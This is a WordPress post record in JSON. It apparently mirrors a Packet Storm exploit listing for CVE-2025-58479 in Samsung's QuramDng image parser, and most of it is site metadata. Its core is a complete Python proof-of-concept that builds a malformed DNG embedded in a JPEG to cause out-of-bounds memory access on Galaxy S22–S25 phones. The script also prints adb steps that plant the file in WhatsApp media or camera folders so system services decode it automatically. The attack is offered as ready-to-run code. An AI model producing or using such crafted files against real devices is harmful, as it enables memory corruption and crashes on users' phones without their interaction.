{"id":39820,"date":"2026-02-09T10:52:41","date_gmt":"2026-02-09T10:52:41","guid":{"rendered":"http:\/\/localhost\/?p=39820"},"modified":"2026-02-09T10:52:41","modified_gmt":"2026-02-09T10:52:41","slug":"samsung-quramdng-embedded-dng-out-of-bounds-read-write","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39820","title":{"rendered":"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:19:24&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates an out-of-bounds read \/ write vulnerability in Samsung&#8217;s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. By crafting a malformed DNG that abuses the OpcodeList1 specifically the&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-09T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-09T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215150&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-58479&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Samsung QuramDng via Malicious DNG Embedded in JPEG Out-of-Bounds Read\/Write                                                |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.samsung.com\/us\/                                                                                                 |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/213367\/ \\u0026 CVE-2025-58479\\n    \\n    [+] Summary    : This proof-of-concept demonstrates an out-of-bounds read\/write vulnerability in Samsung\u2019s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. \\n                     By crafting a malformed DNG that abuses the OpcodeList1 (specifically the FixBadPixelsList opcode) and embedding it inside a JPEG container, the parser processes invalid pixel coordinates without proper bounds checking. \\n                     When handled by system components such as com.samsung.ipservice, Media Scanner, or Samsung Gallery, the malformed metadata can trigger memory corruption and result in a crash (SIGSEGV) within libimagecodec.quram.so.\\n    \\n    [+] POC :\\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import struct\\n    import sys\\n    import os\\n    \\n    def create_malicious_dng():\\n    \\n        dng_data = bytearray()\\n        dng_data.extend(b&#8217;II\\\\x2A\\\\x00&#8242;)  \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 8))  \\n        ifd0_offset = len(dng_data)\\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 5))  \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 256))  \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 4))    \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 1))    \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 1024)) \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 257))  \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 4))    \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 1))  \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 32))  \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 322))  \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 4))    \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 1))    \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 1024))\\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 323)) \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 4))   \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 1))   \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 32))   \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 51008)) \\n        dng_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 1))    \\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 100))  \\n        opcode_offset = len(dng_data) + 4\\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, opcode_offset))\\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 0))\\n        dng_data.extend(struct.pack(&#8216;\\u003cI&#8217;, opcode_offset))  \\n        opcode_data = bytearray()\\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 1))  \\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 36)) \\n        opcode_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x00030001)) \\n        opcode_data.extend(struct.pack(&#8216;\\u003cI&#8217;, 0x41414141))\\n        opcode_data.extend(struct.pack(&#8216;\\u003cB&#8217;, 0))\\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 1))\\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 1))\\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 32))  \\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 0))   \\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 0))  \\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 0)) \\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 1))  \\n        opcode_data.extend(struct.pack(&#8216;\\u003cH&#8217;, 1)) \\n    \\n        while len(opcode_data) \\u003c 36:\\n            opcode_data.extend(b&#8217;\\\\x00&#8242;)\\n    \\n        dng_data.extend(opcode_data)\\n    \\n        image_data_offset = len(dng_data)\\n        dng_data.extend(b&#8217;\\\\x00&#8242; * 1024 * 32 * 2)  # Minimal raw image data\\n    \\n        return bytes(dng_data)\\n    \\n    def create_poc_jpeg_wrapper():\\n    \\n    \\n        jpeg_data = bytearray()\\n    \\n        jpeg_data.extend(b&#8217;\\\\xFF\\\\xD8\\\\xFF\\\\xE0&#8242;)  \\n        jpeg_data.extend(b&#8217;\\\\x00\\\\x10&#8242;)          \\n        jpeg_data.extend(b&#8217;JFIF\\\\x00\\\\x01\\\\x02\\\\x00\\\\x00\\\\x64\\\\x00\\\\x64\\\\x00\\\\x00&#8242;)\\n    \\n        jpeg_data.extend(b&#8217;\\\\xFF\\\\xFE&#8217;)  \\n        comment = b\\&#8221;Malicious DNG for CVE-2025-58479\\&#8221;\\n        jpeg_data.extend(struct.pack(&#8216;\\u003eH&#8217;, len(comment) + 2))\\n        jpeg_data.extend(comment)\\n        \\n        dng_data = create_malicious_dng()\\n        jpeg_data.extend(b&#8217;\\\\xFF\\\\xED&#8217;)  \\n        jpeg_data.extend(struct.pack(&#8216;\\u003eH&#8217;, len(dng_data) + 2))\\n        jpeg_data.extend(dng_data)\\n      \\n        jpeg_data.extend(b&#8217;\\\\xFF\\\\xDB&#8217;)  \\n        jpeg_data.extend(b&#8217;\\\\x00\\\\x43\\\\x00\\\\x03\\\\x02\\\\x02\\\\x02\\\\x02\\\\x02\\\\x03\\\\x02\\\\x02\\\\x02\\\\x03\\\\x03\\\\x03\\\\x03\\\\x04\\\\x06\\\\x04\\\\x04\\\\x04\\\\x04\\\\x04\\\\x08\\\\x06\\\\x06\\\\x05\\\\x06\\\\x09\\\\x08\\\\x0A\\\\x0A\\\\x09\\\\x08\\\\x09\\\\x09\\\\x0A\\\\x0C\\\\x0F\\\\x0C\\\\x0A\\\\x0B\\\\x0E\\\\x0B\\\\x09\\\\x09\\\\x0D\\\\x11\\\\x0D\\\\x0E\\\\x0F\\\\x10\\\\x10\\\\x11\\\\x10\\\\x0A\\\\x0C\\\\x12\\\\x13\\\\x12\\\\x10\\\\x13\\\\x0F\\\\x10\\\\x10\\\\x10\\\\x01&#8242;)\\n        \\n        jpeg_data.extend(b&#8217;\\\\xFF\\\\xC0&#8242;) \\n        jpeg_data.extend(b&#8217;\\\\x00\\\\x0B\\\\x08\\\\x00\\\\x01\\\\x00\\\\x01\\\\x03\\\\x01\\\\x22\\\\x00\\\\x02\\\\x11\\\\x01\\\\x03\\\\x11\\\\x01&#8242;)\\n        jpeg_data.extend(b&#8217;\\\\xFF\\\\xC4&#8242;)  \\n        jpeg_data.extend(b&#8217;\\\\x00\\\\x1F\\\\x00\\\\x00\\\\x01\\\\x05\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\x09\\\\x0A\\\\x0B&#8217;)\\n        jpeg_data.extend(b&#8217;\\\\x00\\\\x0C\\\\x03\\\\x01\\\\x00\\\\x02\\\\x11\\\\x03\\\\x11\\\\x00\\\\x3F\\\\x00&#8242;)\\n        jpeg_data.extend(b&#8217;\\\\x00&#8242;)\\n        jpeg_data.extend(b&#8217;\\\\xFF\\\\xD9&#8242;)\\n        \\n        return bytes(jpeg_data)\\n    \\n    def main():\\n        print(\\&#8221;[*] Creating PoC for CVE-2025-58479 &#8211; Samsung QuramDng OOB Vulnerability\\&#8221;)\\n        print(\\&#8221;[*] Affected: Samsung Galaxy S22-S25 with One UI 6+\\&#8221;)\\n    \\n        poc_data = create_poc_jpeg_wrapper()\\n    \\n        filename = \\&#8221;poc_cve_2025_58479.jpeg\\&#8221;\\n        with open(filename, \\&#8221;wb\\&#8221;) as f:\\n            f.write(poc_data)\\n        \\n        print(f\\&#8221;[+] Created malicious file: {filename}\\&#8221;)\\n        print(f\\&#8221;[+] File size: {len(poc_data)} bytes\\&#8221;)\\n    \\n        print(\\&#8221;\\\\n[*] To test on device:\\&#8221;)\\n        print(f\\&#8221;    adb push {filename} \/storage\/emulated\/0\/Android\/media\/com.whatsapp\/WhatsApp\/Media\/WhatsApp\\\\\\\\ Images\/\\&#8221;)\\n        print(f\\&#8221;    adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/Android\/media\/com.whatsapp\/WhatsApp\/Media\/WhatsApp%20Images\/{filename}\\&#8221;)\\n        print(\\&#8221;\\\\n[*] Wait ~5 minutes for com.samsung.ipservice to process the file\\&#8221;)\\n        print(\\&#8221;[*] Expected: Crash in libimagecodec.quram.so with SIGSEGV\\&#8221;)\\n    \\n        print(\\&#8221;\\\\n[*] Alternative test with Gallery:\\&#8221;)\\n        print(f\\&#8221;    adb push {filename} \/storage\/emulated\/0\/DCIM\/Camera\/\\&#8221;)\\n        print(f\\&#8221;    adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/DCIM\/Camera\/{filename}\\&#8221;)\\n        print(\\&#8221;\\\\n[*] Open Samsung Gallery to trigger decode\\&#8221;)\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    \\n    Greetings to :============================================================\\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n    ==========================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215150&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.5,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215150\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:19:24&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates an out-of-bounds read \/ write vulnerability in Samsung&#8217;s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. By&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-39820","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39820\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:19:24&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates an out-of-bounds read \/ write vulnerability in Samsung&#8217;s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. By...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39820\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-09T10:52:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39820#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39820\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \\\/ Write_PACKETSTORM:215150\",\"datePublished\":\"2026-02-09T10:52:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39820\"},\"wordCount\":1234,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39820#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39820\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39820\",\"name\":\"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \\\/ Write_PACKETSTORM:215150 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-09T10:52:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39820#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39820\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39820#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \\\/ Write_PACKETSTORM:215150\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39820","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:19:24&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates an out-of-bounds read \/ write vulnerability in Samsung&#8217;s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. By...","og_url":"https:\/\/zero.redgem.net\/?p=39820","og_site_name":"zero redgem","article_published_time":"2026-02-09T10:52:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39820#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39820"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150","datePublished":"2026-02-09T10:52:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39820"},"wordCount":1234,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39820#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39820","url":"https:\/\/zero.redgem.net\/?p=39820","name":"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-09T10:52:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39820#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39820"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39820#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write_PACKETSTORM:215150"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39820","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39820"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39820\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39820"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39820"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39820"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}